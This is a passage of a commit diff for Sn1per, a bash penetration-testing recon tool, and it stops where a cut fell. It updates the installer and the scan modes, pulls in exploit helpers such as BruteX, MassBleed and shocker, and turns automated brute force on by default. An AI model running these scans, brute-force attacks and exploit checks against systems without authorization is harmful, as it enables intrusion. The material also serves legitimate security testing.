Sn1per by 1N3@CrowdShield

Update sniper

CHANGELOG.md

@@ -1,4 +1,21 @@
 ## CHANGELOG:
+* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
+* v2.1 - Added full NMap detailed port scans
+* v2.1 - Added port 4443/tcp checks
+* v2.1 - Added META tag scans for web apps
+* v2.1 - Removed Uniscan from web mode
+* v2.1 - Removed SQLMap from web mode
+* v2.0b - Added help option --help
+* v2.0a - Fixed issue with ssh-audit
+* v2.0a - Fixed issue with 'discover' mode
+* v2.0 - Updated sub-domain takeover list
+* v2.0 - Improved scan performance for stealth, airstrike and discover modes
+* v2.0 - Removed jexboss due to clear screen issue with output
+* v2.0 - Auto loot directory sorting for all tools
+* v2.0 - Updated install.sh package list
+* v1.9c - Enabled BruteX automated brute force attacks
+* v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack)
+* v1.9a - Removed testssl script from stealth mode scans
 * v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
 * v1.9 - Added automatic loot directory sorting for all modes
 * v1.9 - Added MSSQL port 1433/tcp checks

README.md

@@ -1,4 +1,4 @@
-![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png)
+![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.jpg)
 
 ## ABOUT:
 Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. 

TODO.md

@@ -0,0 +1,3 @@
+###TODO:
+
+* Add automatic reporting for all scans by default

install.sh

@@ -18,57 +18,65 @@ echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""
 
-# DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
 INSTALL_DIR=/usr/share/sniper
+PLUGINS_DIR=/usr/share/sniper/plugins
 
 echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
-read answer
+read answer 
 
 mkdir -p $INSTALL_DIR 2> /dev/null
 cp -Rf $PWD/* $INSTALL_DIR 
 cd $INSTALL_DIR
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install ruby nslookup rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php5 php5-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
-pip install dnspython colorama tldextract urllib3 ipaddress
+apt-get install ruby rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
+pip install dnspython colorama tldextract urllib3 ipaddress arachni
 
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
 gem install ruby-nmap net-http-persistent mechanize text-table
 
 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
-rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/
+rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
+mkdir /usr/share/sniper/plugins/
+cd $PLUGINS_DIR
 
 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
-git clone https://github.com/1N3/Findsploit.git
-git clone https://github.com/1N3/BruteX.git
-git clone https://github.com/1N3/Goohak.git
-git clone https://github.com/1N3/XSSTracer.git
-git clone https://github.com/1N3/MassBleed.git
-git clone https://github.com/1N3/SuperMicro-Password-Scanner
-git clone https://github.com/Dionach/CMSmap.git
-git clone https://github.com/0xsauby/yasuo.git
-git clone https://github.com/johndekroon/serializekiller.git
-git clone https://github.com/aboul3la/Sublist3r.git
-git clone https://github.com/nccgroup/shocker.git
-git clone https://github.com/joaomatosf/jexboss.git
-git clone https://github.com/drwetter/testssl.sh.git
-git clone https://github.com/lunarca/SimpleEmailSpoofer
-git clone https://github.com/arthepsy/ssh-audit
-
+git clone https://github.com/1N3/Findsploit.git 
+git clone https://github.com/1N3/BruteX.git 
+git clone https://github.com/1N3/Goohak.git 
+git clone https://github.com/1N3/XSSTracer.git 
+git clone https://github.com/1N3/MassBleed.git 
+git clone https://github.com/1N3/SuperMicro-Password-Scanner 
+git clone https://github.com/Dionach/CMSmap.git 
+git clone https://github.com/0xsauby/yasuo.git 
+git clone https://github.com/johndekroon/serializekiller.git 
+git clone https://github.com/aboul3la/Sublist3r.git 
+git clone https://github.com/nccgroup/shocker.git 
+git clone https://github.com/drwetter/testssl.sh.git 
+git clone https://github.com/lunarca/SimpleEmailSpoofer 
+git clone https://github.com/arthepsy/ssh-audit 
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
-mkdir loot 2> /dev/null
+cd $PLUGINS_DIR/BruteX/
+bash install.sh
+cd $INSTALL_DIR 
+mkdir $LOOT_DIR 2> /dev/null
+mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
+mkdir $LOOT_DIR/nmap -p 2> /dev/null
+mkdir $LOOT_DIR/domains -p 2> /dev/null
+mkdir $LOOT_DIR/output -p 2> /dev/null
+mkdir $LOOT_DIR/reports -p 2> /dev/null
 cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
 chmod +x $INSTALL_DIR/sniper
 chmod +x $INSTALL_DIR/bin/dnsdict6
-chmod +x $INSTALL_DIR/Goohak/goohak
-chmod +x $INSTALL_DIR/XSSTracer/xsstracer.py
-chmod +x $INSTALL_DIR/MassBleed/massbleed
-chmod +x $INSTALL_DIR/MassBleed/heartbleed.py
-chmod +x $INSTALL_DIR/MassBleed/openssl_ccs.pl
-chmod +x $INSTALL_DIR/MassBleed/winshock.sh 
-chmod +x $INSTALL_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
-chmod +x $INSTALL_DIR/testssl.sh/testssl.sh
+chmod +x $PLUGINS_DIR/Goohak/goohak
+chmod +x $PLUGINS_DIR/XSSTracer/xsstracer.py
+chmod +x $PLUGINS_DIR/MassBleed/massbleed
+chmod +x $PLUGINS_DIR/MassBleed/heartbleed.py
+chmod +x $PLUGINS_DIR/MassBleed/openssl_ccs.pl
+chmod +x $PLUGINS_DIR/MassBleed/winshock.sh 
+chmod +x $PLUGINS_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
+chmod +x $PLUGINS_DIR/testssl.sh/testssl.sh
 rm -f /usr/bin/sniper
 rm -f /usr/bin/goohak
 rm -f /usr/bin/xsstracer
@@ -76,17 +84,15 @@ rm -f /usr/bin/findsploit
 rm -f /usr/bin/copysploit
 rm -f /usr/bin/compilesploit
 rm -f /usr/bin/massbleed
-rm -f /usr/bin/brutex
 rm -f /usr/bin/testssl
 ln -s $INSTALL_DIR/sniper /usr/bin/sniper
-ln -s $INSTALL_DIR/Goohak/goohak /usr/bin/goohak
-ln -s $INSTALL_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
-ln -s $INSTALL_DIR/Findsploit/findsploit /usr/bin/findsploit
-ln -s $INSTALL_DIR/Findsploit/copysploit /usr/bin/copysploit
-ln -s $INSTALL_DIR/Findsploit/compilesploit /usr/bin/compilesploit
-ln -s $INSTALL_DIR/MassBleed/massbleed /usr/bin/massbleed
-ln -s $INSTALL_DIR/BruteX/brutex /usr/bin/brutex
-ln -s $INSTALL_DIR/testssl.sh/testssl.sh /usr/bin/testssl
+ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak
+ln -s $PLUGINS_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
+ln -s $PLUGINS_DIR/Findsploit/findsploit /usr/bin/findsploit
+ln -s $PLUGINS_DIR/Findsploit/copysploit /usr/bin/copysploit
+ln -s $PLUGINS_DIR/Findsploit/compilesploit /usr/bin/compilesploit
+ln -s $PLUGINS_DIR/MassBleed/massbleed /usr/bin/massbleed
+ln -s $PLUGINS_DIR/testssl.sh/testssl.sh /usr/bin/testssl
 echo -e "$OKORANGE + -- --=[Done!$RESET"
 echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"
 

sniper

@@ -1,5 +1,5 @@
 #!/bin/bash
-# + -- --=[Sn1per v1.9 by 1N3
+# + -- --=[Sn1per v2.0 by 1N3 
 # + -- --=[http://crowdshield.com
 #
 # Sn1per - Automated Pentest Recon Tool
@@ -30,23 +30,21 @@
 # ./sniper <targets.txt> nuke <report>
 # ./sniper loot
 #
-# UNCOMMENT AND SET TARGET DIR FOR UNIVERSAL ACCESS (ie. sniper <target>)
-cd /usr/share/sniper/ 
-
-#clear
 
 TARGET="$1"
 MODE="$2"
 OPT1="$3"
-LOOT_DIR="loot"
-CMSMAP="CMSmap/cmsmap.py"
-SAMRDUMP="bin/samrdump.py"
-DNSDICT6="bin/dnsdict6"
-INURLBR="bin/inurlbr.php"
-USER_FILE="BruteX/wordlists/simple-users.txt"
-PASS_FILE="BruteX/wordlists/password.lst"
-DNS_FILE="BruteX/wordlists/namelist.txt"
-SUPER_MICRO_SCAN="SuperMicro-Password-Scanner/supermicro_scan.sh"
+INSTALL_DIR="/usr/share/sniper"
+LOOT_DIR="/usr/share/sniper/loot"
+PLUGINS_DIR="/usr/share/sniper/plugins"
+CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
+SAMRDUMP="/usr/share/sniper/bin/samrdump.py"
+DNSDICT6="/usr/share/sniper/bin/dnsdict6"
+INURLBR="/usr/share/sniper/bin/inurlbr.php"
+USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
+PASS_FILE="/usr/share/brutex/wordlists/password.lst"
+DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
+SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
 THREADS="30"
 OKBLUE='\033[94m'
 OKRED='\033[91m'
@@ -54,11 +52,77 @@ OKGREEN='\033[92m'
 OKORANGE='\033[93m'
 RESET='\e[0m'
 REGEX='^[0-9]+$'
-DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
 
 # ENABLE/DISABLE AUTOMATIC BRUTE FORCE
-# DEFAULT IS "0" (DISABLED)
-AUTOBRUTE="0"
+# DEFAULT IS "1" (ENABLED)
+AUTOBRUTE="1"
+
+# ENABLE/DISABLE FULL DETAILED NMAP SCAN
+# DEFAULT IS "1" (ENABLED)
+FULLNMAPSCAN="1"
+
+cd $INSTALL_DIR
+
+function loot {
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo ""
+	cd $LOOT_DIR
+	echo -e "$OKORANGE + -- --=[Sorting loot directory ($LOOT_DIR)"
+	echo -e "$OKORANGE + -- --=[Generating reports..."
+	for a in `ls sniper-*.txt 2>/dev/null`; 
+	do 
+		echo "$a" > $LOOT_DIR/reports/$a
+		sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
+		mv $a $LOOT_DIR/output/
+	done
+	rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+	echo -e "$OKORANGE + -- --=[Opening loot directory..."
+	iceweasel $LOOT_DIR &> /dev/null &
+	zenmap -f $LOOT_DIR/nmap/ &> /dev/null &
+	echo -e "$OKORANGE + -- --=[Done!"
+}
+
+function help {
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo ""
+	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
+	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[Usage:"
+	echo ""
+	echo ' [*] sniper <target> <report>'
+	echo ' [*] sniper <target> stealth <report>'
+	echo ' [*] sniper <CIDR> discover'
+	echo ' [*] sniper <target> port <portnum> '
+	echo ' [*] sniper <target> web <report>'
+	echo ' [*] sniper <target> nobrute <report>'
+	echo ' [*] sniper <targets.txt> airstrike <report>'
+	echo ' [*] sniper <targets.txt> nuke <report>'
+	echo ' [*] sniper loot'
+	echo ""
+	echo ' + -- --=[Modes:'
+	echo ''
+   echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
+   echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
+   echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
+   echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
+   echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
+   echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
+   echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
+   echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
+   echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
+   echo ""
+   echo ""
+}
 
 if [ -z $TARGET ]; then
 	echo -e "$OKRED                ____               $RESET"
@@ -69,12 +133,17 @@ if [ -z $TARGET ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e ""
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
-	echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3$RESET"
 	echo -e "$OKORANGE + -- --=[Usage: sn1per <target>$RESET"
 	echo ""
 	exit
 fi
 
+if [[ $TARGET = "--help" ]]; then
+	help
+	exit
+fi
+
 if [[ ${TARGET:0:1} =~ $REGEX ]]; 
 	then 
 	SCAN_TYPE="IP"
@@ -82,40 +151,13 @@ else
 	SCAN_TYPE="DOMAIN"
 fi
 
-#clear
-
 if [ "$MODE" = "report" ]; then
-	./sniper $TARGET | tee ./loot/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
+	sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
 	exit
 fi
 
 if [ "$TARGET" = "loot" ]; then
-	echo -e "$OKRED                ____               $RESET"
-	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
-	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
-	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
-	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
-	echo -e "$OKRED               /_/                 $RESET"
-	echo ""
-	cd $PWD/loot/
-	echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
-	mkdir reports/ -p 2> /dev/null
-	echo -e "$OKORANGE + -- --=[Generating reports..."
-	for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
-	mv $PWD/report-* $PWD/reports/ 2> /dev/null
-	mkdir $PWD/screenshots/ -p 2> /dev/null
-	mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
-	mkdir $PWD/nmap -p 2> /dev/null
-	mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
-	mkdir $PWD/domains -p 2> /dev/null
-	mv $PWD/domains-* $PWD/domains/ 2> /dev/null
-	mkdir $PWD/output -p 2> /dev/null
-	mv $PWD/sniper-* $PWD/output 2> /dev/null
-	rm -f $PWD/.fuse_* 2> /dev/null
-	echo -e "$OKORANGE + -- --=[Opening loot directory..."
-	iceweasel $PWD &> /dev/null &
-	zenmap -f $PWD/nmap/ &> /dev/null &
-	echo -e "$OKORANGE + -- --=[Done!"
+	loot
 	exit
 fi
 
@@ -140,18 +182,18 @@ if [ "$MODE" = "discover" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
 	arp -a -n
 	echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
-	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $PWD/loot/sniper-ips.txt
+	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
-	cat $PWD/loot/sniper-ips.txt
+	cat $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
 	echo ""
 	if [ "$OPT1" = "report" ]; then
-		for a in `cat $PWD/loot/sniper-ips.txt` 
+		for a in `cat $LOOT_DIR/domains/sniper-ips.txt` 
 			do sniper $a stealth report
 		done
 		exit
 	fi	
-	for a in `cat $PWD/loot/sniper-ips.txt` 
+	for a in `cat $LOOT_DIR/domains/sniper-ips.txt` 
 		do sniper $a stealth 
 	done
 	exit
@@ -159,29 +201,15 @@ fi
 
 if [ "$MODE" = "web" ]; then
 	if [ "$OPT1" = "report" ]; then
-		./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
-		cd $PWD/loot/
-		echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
-		mkdir reports/ -p 2> /dev/null
-		echo -e "$OKORANGE + -- --=[Generating reports..."
-		for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
-		mv $PWD/report-* $PWD/reports/ 2> /dev/null
-		mkdir $PWD/screenshots/ -p 2> /dev/null
-		mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
-		mkdir $PWD/nmap -p 2> /dev/null
-		mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
-		mkdir $PWD/domains -p 2> /dev/null
-		mv $PWD/domains-* $PWD/domains/ 2> /dev/null
-		mkdir $PWD/output -p 2> /dev/null
-		mv $PWD/sniper-* $PWD/output 2> /dev/null
-		rm -f $PWD/.fuse_* 2> /dev/null
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		loot
 		exit
 	fi
 fi
 
 if [ "$MODE" = "stealth" ]; then
 	if [ "$OPT1" = "report" ]; then
-		./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 
 		exit
 	fi
 	echo -e "$OKRED                ____               $RESET"
@@ -192,7 +220,7 @@ if [ "$MODE" = "stealth" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3"
+	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
 	echo -e "$OKRED " 	
 	echo -e "$OKRED     ./\."
 	echo -e "$OKRED   ./    '\."
@@ -236,59 +264,81 @@ if [ "$MODE" = "stealth" ]; then
 		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 		dig -x $TARGET
 		dnsenum $TARGET
-		mv -f *_ips.txt loot/ 2>/dev/null
+		mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-		python Sublist3r/sublist3r.py -d $TARGET -vvv -o loot/domains/domains-$TARGET.txt 2>/dev/null
-		dos2unix loot/domains/domains-$TARGET.txt 2>/dev/null
+		python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+		dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 		echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
-		for a in `cat loot/domains/domains-$TARGET.txt`; do dig $a CNAME | egrep -i "heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done;
+		for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done;
 		echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-		python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+		python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 	fi
 	echo ""
 	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
+	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
 	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
-	echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
-	wafw00f http://$TARGET
-	wafw00f https://$TARGET
-	echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
-	whatweb http://$TARGET
-	whatweb https://$TARGET
-	xsstracer $TARGET 80
-	xsstracer $TARGET 443
-	echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
-	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
-	sslscan --no-failed $TARGET
-	testssl $TARGET
-	echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
-	cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg
-	echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port80.jpg"
-	cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg
-	echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port443.jpg"
+	
+	port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+	port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+	
+	if [ -z "$port_80" ];
+	then
+		echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
+	else
+		echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+		wafw00f http://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+		whatweb http://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+		xsstracer $TARGET 80
+		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+		cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
+	fi
+	
+	if [ -z "$port_443" ];
+	then
+		echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
+	else
+		echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+		wafw00f https://$TARGET 
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+		whatweb https://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+		xsstracer $TARGET 443
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
+		sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
+		sslscan --no-failed $TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+		cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
+		echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$a-port443.jpg"
+	fi
+	
 	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
-	cd $PWD/loot/
-	echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
-	mkdir reports/ -p 2> /dev/null
-	echo -e "$OKORANGE + -- --=[Generating reports..."
-	for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
-	mv $PWD/report-* $PWD/reports/ 2> /dev/null
-	mkdir $PWD/screenshots/ -p 2> /dev/null
-	mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
-	mkdir $PWD/nmap -p 2> /dev/null
-	mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
-	mkdir $PWD/domains -p 2> /dev/null
-	mv $PWD/domains-* $PWD/domains/ 2> /dev/null
-	mkdir $PWD/output -p 2> /dev/null
-	mv $PWD/sniper-* $PWD/output 2> /dev/null
-	rm -f $PWD/.fuse_* 2> /dev/null
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
 	exit
 fi
 
 if [ "$MODE" = "airstrike" ]; then
 	if [ "$OPT1" = "report" ]; then
-		./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
 		exit
 	fi
 	echo -e "$OKRED                ____               $RESET"
@@ -299,7 +349,7 @@ if [ "$MODE" = "airstrike" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v1.9 by 1N3"
+	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
 
 	for a in `cat $TARGET`;
 	do
@@ -348,53 +398,57 @@ if [ "$MODE" = "airstrike" ]; then
 			echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 			dig -x $a
 			dnsenum $a
-			mv -f *_ips.txt loot/ 2>/dev/null
+			mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 			echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-			python Sublist3r/sublist3r.py -d $a -vvv -o loot/domains/domains-$a.txt 2>/dev/null
-			dos2unix loot/domains/domains-$a.txt 2>/dev/null
